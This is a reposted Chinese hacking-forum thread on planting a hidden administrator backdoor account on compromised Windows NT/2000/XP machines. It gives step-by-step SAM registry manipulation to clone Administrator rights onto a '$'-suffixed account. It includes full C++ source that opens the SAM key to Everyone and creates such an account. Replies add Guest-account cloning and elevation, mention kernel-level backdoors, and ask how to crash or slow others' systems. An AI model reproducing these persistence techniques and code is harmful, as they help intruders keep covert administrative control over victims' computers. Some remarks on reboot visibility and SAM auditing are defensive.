[转载]如何建立隐藏的超级用户
信息来源:太平洋电脑对regedit.exe我想大家都很熟悉,但却不能对注册表的项键设置权限,而regedt32.exe最大的优点就是能够对注册表的项键设置权限。nt/2000/xp的帐户信息都在注册表的HKEY_LOCAL_MACHINE\SAM\SAM键下,但是除了系统用户SYSTEM外,其它用户都无权查看到里面的信息,因此我首先用regedt32.exe对SAM键为我设置为“完全控制”权限。这样就可以对SAM键内的信息进行读写了了。具体步聚如下:
1、假设我们是以超级用户administrator登录到开有终端服务的肉鸡上的,首先在命令行下或帐户管理器中建立一个帐户:hacker$,这里我在命令行下建立这个帐户 net user hacker$ 1234 /add
2、在开始/运行中输入:regedt32.exe并回车来运行regedt32.exe。
3、点“权限”以后会弹出窗口点添加将我登录时的帐户添加到安全栏内,这里我是以administrator的身份登录的,所以我就将administrator加入,并设置权限为“完全控制"。这里需要说明一下:最好是添加你登录的帐户或帐户所在的组,切莫修改原有的帐户或组,否则将会带来一系列不必要的问题。等隐藏超级用户建好以,再来这里将你添加的帐户删除即可。
4、再点“开始”→“运行”并输入"regedit.exe" 回车,启动注册表编辑器regedit.exe。 打开键:HKEY_LOCAL_MAICHINE\SAM\SAM\Domains\account\user\names\hacker$"
5、将项hacker$、00000409、000001F4导出为hacker.reg、409.reg、1f4.reg,用记事本分别打这几个导出的文件进行编辑,将超级用户对应的项000001F4下的键"F"的值复制,并覆盖hacker$对应的项00000409下的键"F"的值,然后再将00000409.reg与hacker.reg合并。
6、在命令行下执行net user hacker$ /del将用户hacker$删除:net user hacker$ /del
7、在regedit.exe的窗口内按F5刷新,然后打文件-导入注册表文件将修改好的hacker.reg导入注册表即可
8、到此,隐藏的超级用户hacker$已经建好了,然后关闭regedit.exe。在regedt32.exe窗口内把HKEY_LOCAL_MACHINE\SAM\SAM键权限改回原来的样子(只要删除添加的帐户administrator即可)。
9、注意:隐藏的超级用户建好后,在帐户管理器看不到hacker$这个用户,在命令行用“net user”命令也看不到,但是超级用户建立以后,就不能再改密码了,如果用net user命令来改hacker$的密码的话,那么在帐户管理器中将又会看这个隐藏的超级用户了,而且不能删除。 重启后会被显示的,通过导入注册表的方法添加帐号,帐户管理器并没有刷新,所以当时看不到,重启后帐户管理里面一样可以看到。 我测试后不行,计算机管理中还是显示了“hack$” 不知道怎么回事?
不过这个方法科隆guest 可以通过! 大虾说清楚平台啊。 不是所以有平台都可以啊。 我试过了。 在XP SP2下就不行啊。 还是可以看到加了$的用户啊。
不知道是不是真的。
XP往后的系统把regedt32取消了,其实是把功能都整合到了regedit里头了。
顺便申请VIP^_^ 这篇文章真的该放到讨论区批斗一把了.
隐藏用户是根本做不到的.
只是手工修改以后没法立即显示
只要一重启就可以看到了
WIN2000~XP~2003.没一个可以真正隐藏的.
帮别人查看机器的时候
很多上面入侵者自以为聪明的加上xxx$之类的.
简直是掩耳盗铃啊. 留个内核级后门
象黑客守护者一类的.用的时候把用户 加上
不用的时候,把用户 DEL 就好 了. 大家看下我的方法怎么样 管理和CMD下都看不到
[url]http://www.25xiaoshi.com/[/url]制作超级隐藏的帐号后门.rar 演示动画 自己发现的方法请各位批斗 2000GUEST可以!XP 2003到现在没发现个好方法! 关于增加一个隐藏帐号,
在注册表增加如下:
所以把这个[HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\A$]
@=hex(1f4):
对2000和xp有效,但是重启之后,进入管理工具中无法打开用户一拦
xp中启动截面只能够用经典的登陆,即输入两次ctrl+alt+del才可以!
代码很简单,只是增加了以上的注册表健值!
xp+vs.net 2003编译通过
// creatadmin.cpp : 定义控制台应用程序的入口点。
//
#include "stdafx.h"
#include <Windows.h>
#include <Aclapi.h>
/* 在注册表sam键下面的SAM\\SAM\\Domains\\Account\\Users\\Names新加一个带"$"的用户就可以实现隐藏;在2000,xp下测试
问题:2000下重启后在计算机管理工具中的本地用户和组将无法再显示
xp的启动界面只能够由经典的登陆模式,即双击ctrl+alt+del登陆!!!*/
void _tmain(int argc, _TCHAR* argv[])
{
std::string sam = "SAM\\SAM\\Domains\\Account\\Users\\Names";
if (argc != 2)
{
printf("Welcome to [url]Http://systest2005.52blog.net[/url]\nmail to:systest2005@126.com!");
printf("\nYou must input the name of administrators you want to create!");
printf("\nUsage:%s name",argv[0] );
printf("\n<name> must end with $");
exit(0);
}
int n = strlen(argv[1]);
if (argv[1][n-1] != '$')
{
printf("The name must end with $");
exit(0);
}
char *s = argv[1];
/*以下代码为网上搜索而来,我也不知道最先的出处*/
DWORD dwRet;
LPSTR SamName = "MACHINE\\SAM\\SAM";
PSECURITY_DESCRIPTOR pSD = NULL;
PACL pOldDacl = NULL;
PACL pNewDacl = NULL;
EXPLICIT_ACCESS ea;
HKEY hKey = NULL;
HKEY mkey = NULL;
// 获取SAM主键的DACL
dwRet = GetNamedSecurityInfo(SamName, SE_REGISTRY_KEY, DACL_SECURITY_INFORMATION,
NULL, NULL, &pOldDacl, NULL, &pSD);
if (dwRet != ERROR_SUCCESS)
{
printf("GetNamedSecurityInfo Error: %d\n", dwRet);
goto FreeAndExit;
}
// 创建一个ACE,允许Everyone完全控制对象,并允许子对象继承此权限
ZeroMemory(&ea, sizeof(EXPLICIT_ACCESS));
BuildExplicitAccessWithName(&ea, "Everyone", KEY_ALL_ACCESS, SET_ACCESS,
SUB_CONTAINERS_AND_OBJECTS_INHERIT);
// 将新的ACE加入DACL
dwRet = SetEntriesInAcl(1, &ea, pOldDacl, &pNewDacl);
if (dwRet != ERROR_SUCCESS)
{
printf("SetEntriesInAcl Error: %d\n", dwRet);
goto FreeAndExit;
}
// 更新SAM主键的DACL
dwRet = SetNamedSecurityInfo(SamName, SE_REGISTRY_KEY, DACL_SECURITY_INFORMATION,
NULL, NULL, pNewDacl, NULL);
if (dwRet != ERROR_SUCCESS)
{
printf("SetNamedSecurityInfo Error: %d\n", dwRet);
goto FreeAndExit;
}
// 打开SAM的子键
dwRet = RegOpenKeyEx(HKEY_LOCAL_MACHINE, "SAM\\SAM\\Domains\\Account\\Users\\names\\",
0, KEY_ALL_ACCESS, &hKey);
if (dwRet != ERROR_SUCCESS)
{
printf("Reg Open Key Error: %d\n", dwRet);
goto FreeAndExit;
}
dwRet = RegCreateKey(hKey,s,&mkey);
if (dwRet != ERROR_SUCCESS)
{
printf("Reg CreatKey Error: %d\n", dwRet);
goto FreeAndExit;
}
dwRet = RegSetValueEx(mkey,NULL,NULL,0x1f4,NULL,0);
if (dwRet != ERROR_SUCCESS)
{
printf("set Key value Error: %d\n", dwRet);
goto FreeAndExit;
}
printf("create SAM Subkey Successfully.\n");
RegCloseKey(hKey);
RegCloseKey(mkey);
FreeAndExit:
if (hKey) RegCloseKey(hKey);
if (pNewDacl) LocalFree(pNewDacl);
// 还原SAM主键的DACL
if (pOldDacl) SetNamedSecurityInfo(SamName, SE_REGISTRY_KEY, DACL_SECURITY_INFORMATION,
NULL, NULL, pOldDacl, NULL);
if (pSD) LocalFree(pSD);
return ;
} 加了$只能在dos下隐藏吧....在窗口下查看用户应该还是看的出的啊 根本做不到完全隐藏
一个稍微懂安全的网络管理员,
查隐藏帐户的时候,一定会去选择在注册表的SAM里面查的
个人认为,用被禁用的GUEST帐户登陆是一个不错的方法....当然..必须是在GUEST没有被完全删除的情况下 个人认为,用被禁用的GUEST帐户登陆是一个不错的方法 不过Guest是可以的。
先设置Guest密码
再客隆Guest
然后再在用户管理里将Guest禁止 加$符号在Administrator下DOS看管理组一样可以看到~
没办法真正隐藏的,试了N个办法了。 目前在2000里guest是完美的隐藏```
2003==还没办法! 我个人喜欢用添加 IUSR_…… 用户 有时候用Sqldebugger Guest 等等。 [quote][b]下面是引用xmasfox于2005-08-02 00:13发表的:[/b]
留个内核级后门
象黑客守护者一类的.用的时候把用户 加上
不用的时候,把用户 DEL 就好 了.[/quote]
那你不累死。。每次都去找工具。。 [s:43] 请问能帮忙推荐一些攻防专家,咨询一些问题吗,非常感谢!我的邮件地址是[email]Lhyang168@vip.sina.com[/email] ,打搅了! 用教主那个软件可以做到真正隐藏吗 真可惜 ,,, 就觉得奇怪。。。。。。。 ^_^..教主要工具还建个 jiaozhu$ 哈哈 我们下学期要近行对等网攻防技术比赛了,我却遇到一些问题请大家帮帮忙。
1>在进攻和防范时只开哪些端口.
2>怎么才能侵入别人的计算机,使他的系统瘫痪.
3>有什么攻击命令吗.
4>大家有没有给我的提意.
上诉前提条件是不能用软件,操作系统是widons2000server.
请大家多帮忙. 日死,这方法不行的。。。
还是会在计算机用户里显示 我测试后不行,计算机管理中还是显示了“hack$” 不知道怎么回事?
不过这个方法科隆guest 可以通过! 重新启动后就不行了,只是当时管用而已,个人还是喜欢把GUEST提权. 果然没来错地方啊,这里的都很厉害啊。我实验了一下好象不行啊? guest提权确实可以用,但是需要在默认条件下
因为默认情况,guest只是禁用,这个确实可以通过修改SAM达到开放以及提权到ADMIN的目的
但是如果我把guest的默认选择上的终端权限去掉,那就不能通过guest登陆terminal server了.
当然.这个guest仍然拥有admin权限并且可以用过shell等其他方式来使用. 我又遇到难题了,怎么使局域的网速变慢。条件是我不是管理员,也不在服务器上操作。帮帮忙,谢谢。
页:
[1]